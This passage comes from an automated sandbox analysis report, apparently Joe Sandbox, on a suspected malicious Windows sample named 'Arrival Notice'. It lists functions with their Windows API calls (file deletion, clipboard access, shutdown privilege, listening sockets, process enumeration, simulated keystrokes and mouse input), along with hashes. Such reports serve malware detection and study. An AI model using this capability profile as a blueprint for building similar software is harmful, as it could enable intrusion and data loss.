                  • Opcode ID: 9704a876d3c43fdd3aea037f8011a810336c1b30e42b73a9fb6c255a6f0f03dc
                  • Instruction ID: f1fb5722247fd9d8ea42e6a4e3af54b1068ab5f9270e4799f4b1596115e78766
                  • Opcode Fuzzy Hash: 9704a876d3c43fdd3aea037f8011a810336c1b30e42b73a9fb6c255a6f0f03dc
                  • Instruction Fuzzy Hash: 6E616A726043159FCB10EF60D8809AFB3E8FF89314F44896EF98987251EB35E945CB96
                  APIs
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                    • Part of subcall function 0041E199: GetFileAttributesW.KERNEL32(?,0041CF95), ref: 0041E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 0041D122
                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0041D1DD
                  • MoveFileW.KERNEL32(?,?), ref: 0041D1F0
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0041D20D
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0041D237
                    • Part of subcall function 0041D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0041D21C,?,?), ref: 0041D2B2
                  • FindClose.KERNEL32(00000000,?,?,?), ref: 0041D253
                  • FindClose.KERNEL32(00000000), ref: 0041D264
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                  • String ID: \*.*
                  • API String ID: 1946585618-1173974218
                  • Opcode ID: 80260f44b9f34b854aae93801cd6a825ba7cc957c3cf367275a5f213b3fd1a76
                  • Instruction ID: cbd148edaea074dafbe1c95e24bd6c40215c017d8db67fb928cbf558378c283c
                  • Opcode Fuzzy Hash: 80260f44b9f34b854aae93801cd6a825ba7cc957c3cf367275a5f213b3fd1a76
                  • Instruction Fuzzy Hash: DE618F71C0110DABCF06EBE0C992AEEB7B5AF15304F2441AAE502BB191EB345F49CB65
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                  • String ID:
                  • API String ID: 1737998785-0
                  • Opcode ID: 3350a9956213fb58508eab75518f12ec3bbe53a05acfaec0ae9e7874a62d2e9e
                  • Instruction ID: 0e3ced3f618b79905d6d8445a22256dde90084b05924d806dce700944ee8cf94
                  • Opcode Fuzzy Hash: 3350a9956213fb58508eab75518f12ec3bbe53a05acfaec0ae9e7874a62d2e9e
                  • Instruction Fuzzy Hash: 1641C0356056219FE320CF16E888B1ABBE5FF45318F59C0AAE4158F762C775EC42CB94
                  APIs
                    • Part of subcall function 004116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041170D
                    • Part of subcall function 004116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041173A
                    • Part of subcall function 004116C3: GetLastError.KERNEL32 ref: 0041174A
                  • ExitWindowsEx.USER32(?,00000000), ref: 0041E932
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                  • String ID: $ $@$SeShutdownPrivilege
                  • API String ID: 2234035333-3163812486
                  • Opcode ID: 3d1546bbcc38ab9c473e579039b7697558b4aecc8ead145c7521646dcfc15b53
                  • Instruction ID: ee79e47083b1c775983bba966f6933b6b6a7c60515d32a94a0ad10ee507fa0ac
                  • Opcode Fuzzy Hash: 3d1546bbcc38ab9c473e579039b7697558b4aecc8ead145c7521646dcfc15b53
                  • Instruction Fuzzy Hash: E2012BBAA20311ABEB5427B69C86FFF725C9B08744F150427FD03E21D1D5AD5CC081AC
                  APIs
                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00431276
                  • WSAGetLastError.WSOCK32 ref: 00431283
                  • bind.WSOCK32(00000000,?,00000010), ref: 004312BA
                  • WSAGetLastError.WSOCK32 ref: 004312C5
                  • closesocket.WSOCK32(00000000), ref: 004312F4
                  • listen.WSOCK32(00000000,00000005), ref: 00431303
                  • WSAGetLastError.WSOCK32 ref: 0043130D
                  • closesocket.WSOCK32(00000000), ref: 0043133C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$closesocket$bindlistensocket
                  • String ID:
                  • API String ID: 540024437-0
                  • Opcode ID: 1bf26688f36e1cda1e7e1d932fdcbc9a8e99639afa262ba1ba108d71a06ed28a
                  • Instruction ID: cad02c8c18dad8e5f2d055b4a21936ce5223f4490618f1b79e4d440c71d3822d
                  • Opcode Fuzzy Hash: 1bf26688f36e1cda1e7e1d932fdcbc9a8e99639afa262ba1ba108d71a06ed28a
                  • Instruction Fuzzy Hash: 0241AF356001009FD710EF24C488B6AFBE5AF4A318F188099E8569F3A6C775EC82CBA5
                  APIs
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                    • Part of subcall function 0041E199: GetFileAttributesW.KERNEL32(?,0041CF95), ref: 0041E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 0041D420
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0041D470
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0041D481
                  • FindClose.KERNEL32(00000000), ref: 0041D498
                  • FindClose.KERNEL32(00000000), ref: 0041D4A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                  • String ID: \*.*
                  • API String ID: 2649000838-1173974218
                  • Opcode ID: 986a72e7550b2a693df74138ee8c51e04fc531baf439e2710e6452b52a1861d1
                  • Instruction ID: 12c875e95133ea7b4cd923a243d273e9d52e72132d5fa05d5b594281ed203dea
                  • Opcode Fuzzy Hash: 986a72e7550b2a693df74138ee8c51e04fc531baf439e2710e6452b52a1861d1
                  • Instruction Fuzzy Hash: F531A071409345ABC301EF64C8919EFB7E8BE92308F444A2EF5D597291EB34AA09C767
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 0349abd4689c6afa2e2ddbf285ef4297922dff488d77c3bb6320d322ca3116e0
                  • Instruction ID: dde438bd53aa391ae51cd54b4e31961d62a8c88d3497e6be7de3e044d5247707
                  • Opcode Fuzzy Hash: 0349abd4689c6afa2e2ddbf285ef4297922dff488d77c3bb6320d322ca3116e0
                  • Instruction Fuzzy Hash: 11C25C72E046698FDB26CF29DD407EAB7B9EB44305F1542EAD40DE7281E774AE818F40
                  APIs
                  • _wcslen.LIBCMT ref: 004264DC
                  • CoInitialize.OLE32(00000000), ref: 00426639
                  • CoCreateInstance.OLE32(0044FCF8,00000000,00000001,0044FB68,?), ref: 00426650
                  • CoUninitialize.OLE32 ref: 004268D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 886957087-24824748
                  • Opcode ID: 890f1b0574181a9a7c4246391111f074307055ea7c8b66b5329535f9ef15d16e
                  • Instruction ID: df8ed87ca02f5fd8271d9e7dee5c8264c5f84d995cbe28e20290c7e38f0f6641
                  • Opcode Fuzzy Hash: 890f1b0574181a9a7c4246391111f074307055ea7c8b66b5329535f9ef15d16e
                  • Instruction Fuzzy Hash: 31D15C71608311AFC315EF24D881AABB7E8FF94708F50496EF6958B291DB30ED45CB92
                  APIs
                  • GetForegroundWindow.USER32(?,?,00000000), ref: 004322E8
                    • Part of subcall function 0042E4EC: GetWindowRect.USER32(?,?), ref: 0042E504
                  • GetDesktopWindow.USER32 ref: 00432312
                  • GetWindowRect.USER32(00000000), ref: 00432319
                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00432355
                  • GetCursorPos.USER32(?), ref: 00432381
                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004323DF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                  • String ID:
                  • API String ID: 2387181109-0
                  • Opcode ID: 00e274a410b456be978134470f16c4c7dccc41475ef5d0a1bc083920fa111f5b
                  • Instruction ID: 83e31d72b56b74cf4f99253fe12c7070465d35eb5ecf4a557ad53bae420f5f5e
                  • Opcode Fuzzy Hash: 00e274a410b456be978134470f16c4c7dccc41475ef5d0a1bc083920fa111f5b
                  • Instruction Fuzzy Hash: 81312272505315AFD720DF25C844B9BB7A9FF88314F04091EF98597281CB78EA08CB9A
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00429B78
                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00429C8B
                    • Part of subcall function 00423874: GetInputState.USER32 ref: 004238CB
                    • Part of subcall function 00423874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00423966
                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00429BA8
                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00429C75
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                  • String ID: *.*
                  • API String ID: 1972594611-438819550
                  • Opcode ID: f415bb93fcb4581b57a749ee3fc77514e9fdc0e8fbaee4302da93e5dc58c1eff
                  • Instruction ID: 0c3609e125d4124389e0026401b9950331d06881be0898cf4367dca55920803f
                  • Opcode Fuzzy Hash: f415bb93fcb4581b57a749ee3fc77514e9fdc0e8fbaee4302da93e5dc58c1eff
                  • Instruction Fuzzy Hash: 76419071A00219AFDF15DF65D889AEE7BB8FF05300F64405BE905A6291EB349E84CF68
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 003C9A4E
                  • GetSysColor.USER32(0000000F), ref: 003C9B23
                  • SetBkColor.GDI32(?,00000000), ref: 003C9B36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$LongProcWindow
                  • String ID:
                  • API String ID: 3131106179-0
                  • Opcode ID: 01e0c2642b8196bf0191c12248fe3cd6277f8599e8a7c477b3b8cd3455c00a69
                  • Instruction ID: 44fa50d054867feeb716f7e8bc92c3aea30acceac76bf2db9b5d4e7aaeded010
                  • Opcode Fuzzy Hash: 01e0c2642b8196bf0191c12248fe3cd6277f8599e8a7c477b3b8cd3455c00a69
                  • Instruction Fuzzy Hash: 7FA12771508404BEE726AA2D8C8CF7F365DDB42354B17452FF002E6AD1CA39AD01D37A
                  APIs
                    • Part of subcall function 0043304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0043307A
                    • Part of subcall function 0043304E: _wcslen.LIBCMT ref: 0043309B
                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0043185D
                  • WSAGetLastError.WSOCK32 ref: 00431884
                  • bind.WSOCK32(00000000,?,00000010), ref: 004318DB
                  • WSAGetLastError.WSOCK32 ref: 004318E6
                  • closesocket.WSOCK32(00000000), ref: 00431915
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 1601658205-0
                  • Opcode ID: 1944a2be2b193905ad380bf70f77c662b96ae48561ded3af2d7d1f764af7bd5b
                  • Instruction ID: 7db8ed3eb1b43f95b32ae4bc613a23a23ba4c37fa7bf79fe07365d1aa584a697
                  • Opcode Fuzzy Hash: 1944a2be2b193905ad380bf70f77c662b96ae48561ded3af2d7d1f764af7bd5b
                  • Instruction Fuzzy Hash: EF51C375A002009FD725AF24C886F6AB7E59B49718F08809DFA059F3D3C775AD418BA5
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                  • String ID:
                  • API String ID: 292994002-0
                  • Opcode ID: a56d761b57dd7711a4e9a793d3ef7bff55dfc458e470a7dfd1c7dc95f1971ebc
                  • Instruction ID: 226722e50d0a009361bb5904c82e422b0f60a869cbe6c54266e57d1d47956d98
                  • Opcode Fuzzy Hash: a56d761b57dd7711a4e9a793d3ef7bff55dfc458e470a7dfd1c7dc95f1971ebc
                  • Instruction Fuzzy Hash: 7F21B4317412115FF7208F1ADCC4B6B7BA5AF95315B19806AE8468B361C775EC82CB98
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                  • API String ID: 0-1546025612
                  • Opcode ID: d6d7d0a463d135e11bec660743dabb76e35c971a9260917f6a704cabe0dec6ab
                  • Instruction ID: 8c9ef91ba7df7a5be549381a873b9f73cefcbfe4756103d4fe9941fba2f29d97
                  • Opcode Fuzzy Hash: d6d7d0a463d135e11bec660743dabb76e35c971a9260917f6a704cabe0dec6ab
                  • Instruction Fuzzy Hash: 50A29E74A0021ECBDF26CF58C8417FDB7B5BF54318F2585AAEA15ABA84DB309D81CB50
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004182AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: lstrlen
                  • String ID: ($tbG$|
                  • API String ID: 1659193697-3186676182
                  • Opcode ID: 203f6f07306d752d8c9e52b3b66eedd8e442d321f765ca7610e22ae06a379063
                  • Instruction ID: b30025a40d0ab5f7c510db63c930d0f49e9d28de149a5e97a0331187bf4831e0
                  • Opcode Fuzzy Hash: 203f6f07306d752d8c9e52b3b66eedd8e442d321f765ca7610e22ae06a379063
                  • Instruction Fuzzy Hash: DF323974A007059FC728DF59C480AAAB7F1FF48710B15C56EE89ADB3A1EB74E981CB44
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0043A6AC
                  • Process32FirstW.KERNEL32(00000000,?), ref: 0043A6BA
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • Process32NextW.KERNEL32(00000000,?), ref: 0043A79C
                  • CloseHandle.KERNEL32(00000000), ref: 0043A7AB
                    • Part of subcall function 003CCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,003F3303,?), ref: 003CCE8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                  • String ID:
                  • API String ID: 1991900642-0
                  • Opcode ID: 5697926021814662940ad451ad5f0fa0c8eee8e0051e48b2bad0834ecc5c65b5
                  • Instruction ID: 9cb9c2bb8b44dbf50f7706066715e76107102e54eee1193d6fd051aff8114f34
                  • Opcode Fuzzy Hash: 5697926021814662940ad451ad5f0fa0c8eee8e0051e48b2bad0834ecc5c65b5
                  • Instruction Fuzzy Hash: 82514E715083009FD715EF24C886A6BBBE8FF89754F00492EF685DB252EB34D904CB92
                  APIs
                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0041AAAC
                  • SetKeyboardState.USER32(00000080), ref: 0041AAC8
                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0041AB36
                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0041AB88
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: b98e5963559b28cdf710d178ae8fe2fe8b33ff60f9dfd0c04349571e3a18cb58
                  • Instruction ID: 958ec7ef0044ba9c65ee72b058832ee9be307cd9fb63d7087a20d28be45e48ae
                  • Opcode Fuzzy Hash: b98e5963559b28cdf710d178ae8fe2fe8b33ff60f9dfd0c04349571e3a18cb58
                  • Instruction Fuzzy Hash: F8312970A86288AEEB30CB65CC05BFB77A6AF45310F04421BF281522D1D37DA9E1C75B
                  APIs
                  • _free.LIBCMT ref: 003EBB7F
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • GetTimeZoneInformation.KERNEL32 ref: 003EBB91
                  • WideCharToMultiByte.KERNEL32(00000000,?,0048121C,000000FF,?,0000003F,?,?), ref: 003EBC09
                  • WideCharToMultiByte.KERNEL32(00000000,?,00481270,000000FF,?,0000003F,?,?,?,0048121C,000000FF,?,0000003F,?,?), ref: 003EBC36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                  • String ID:
                  • API String ID: 806657224-0
                  • Opcode ID: c52fc15b67a84c6a514a72f802f2181e16f4647787231cc76189cd45e70f03a6
                  • Instruction ID: 6753ad1390bdff2db1c39f72a1eda41d4519c4ac53b138b8c9445dd59ec2edf6
                  • Opcode Fuzzy Hash: c52fc15b67a84c6a514a72f802f2181e16f4647787231cc76189cd45e70f03a6
